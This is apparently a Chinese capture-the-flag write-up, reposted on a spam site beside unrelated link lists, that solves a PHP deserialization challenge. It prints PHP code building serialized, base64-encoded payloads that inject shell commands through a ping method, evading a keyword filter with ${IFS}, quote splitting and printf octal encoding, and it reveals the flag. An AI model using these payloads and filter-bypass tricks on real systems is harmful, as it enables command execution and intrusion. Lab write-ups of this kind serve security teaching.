当前位置: 首页 > news >正文

网站模板文件在哪里下载wordpress 整套模板下载

网站模板文件在哪里下载,wordpress 整套模板下载,wordpress分类含有中文,东莞住建局官网网站开启场景 整体来说是创建了一个case类#xff0c;然后可接受post传来的ctf的值#xff0c;并对其进行base64解码以及反序列化。所以我们能控制ctf变量。 先看__wakeup方法#xff0c;该方法使用waf方法对$arg中的内容进行了防护#xff0c;过滤掉了| ; 空格 / cat f… 开启场景 整体来说是创建了一个case类然后可接受post传来的ctf的值并对其进行base64解码以及反序列化。所以我们能控制ctf变量。 先看__wakeup方法该方法使用waf方法对$arg中的内容进行了防护过滤掉了| ; 空格 / cat flag tac php ls。再看__destruct方法该方法检测ping是否在$method中并调用了名为$method的方法且以数组$arg中的值作为参数。接着看ping方法该方法的结构为将输入参数作为外部命令进行执行并返回输出结果。该函数实现了作为一个webshell的基本条件。综合来看就是在通过$method和__construct来调用构造的ping方法接着通过$args来作为输入口进行命令的输入。 查看目录文件 写一段序列化代码对 ls 命令序列化之后再 base64 编码 ?phpclass ease{private $method;private $args;function __construct($method, $args) {$this-method $method;$this-args $args;}} $a new ease(ping,array(ls)); $b serialize($a); echo $b; echo/br; echo base64_encode($b); ? 使用 php在线编译工具编译之后得到了一串 base64 编码 在场景页面打开 F12 使用 hackbar 插件发送post 请求 发现了有一个flag_1s_here文件夹 查看flag_1s_here文件夹 再用序列化代码重复上述操作 ?php class ease{private $method;private $args;function __construct($method, $args) {$this-method $method;$this-args $args;}}$onew ease(ping,array(ls${IFS}flag_1s_here)); $s serialize($o); echo base64_encode($s); ? 再编译得到了 base64 编码 再发送 post 请求 发现了一个flag_831b69012c67b35f.php 文件 查看flag_831b69012c67b35f.php flagcatflagphp都可以用双引号绕过空格用${IFS}绕过/要用printf及$()绕过。 ?phpclass ease{ private $method; private $args; function __construct($method, $args) {$this-method $method;$this-args $args; }} $a new ease(ping,array(cat${IFS}flag_1s_here$(printf${IFS}\57)flag_831b69012c67b35f.php)); $b serialize($a); echo $b; echo/br; echo base64_encode($b); ? 再编译 再发送 post 请求 或者直接对整个要执行的命令用printf及$绕过flag_1s_here/flag_831b69012c67b35f.php的八进制或十六进制编码都可以 ?phpclass ease{private $method; private $args; function __construct($method, $args) {$this-method $method;$this-args $args; }} $a new ease(ping,array($(printf${IFS}\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160))); $b serialize($a); echo $b; echo/br; echo base64_encode($b); ? 最终二者都发现了 flag cyberpeace{90c18db4e46c6499d6e25e37c7babaf9}
http://www.w-s-a.com/news/2098/

相关文章:

  • 佛山企业网站建设平台沈阳网站建设培训班
  • 河南企业网站优化外包网站怎么做来流量
  • 网站建设的参考文献网站设计网页的优缺点
  • WordPress多站點支付插件内江市网站建设培训
  • 做做网站已更新动漫制作专业需要学什么
  • dfv印花图案设计网站网站建设应该应聘什么岗位
  • 网站后台管理系统模板下载专业网站推广的公司哪家好
  • 克拉玛依市建设局网站网页设计板式重构
  • 网站新闻专题怎么做湖南营销型网站建设 要上磐石网络
  • 阿里云发布网站成都轨迹公布
  • php网站源码架构谷歌站群系统
  • 潮州网站seowordpress 调用置顶文章
  • 做带会员后台的网站用什么软件旅游网站建设资金请示
  • 商品网站怎么做wordpress 表情拉长
  • 商城网站设计费用网络公司怎样推广网站
  • 视频公司的网站设计工图网
  • 免费快速网站十八个免费的舆情网站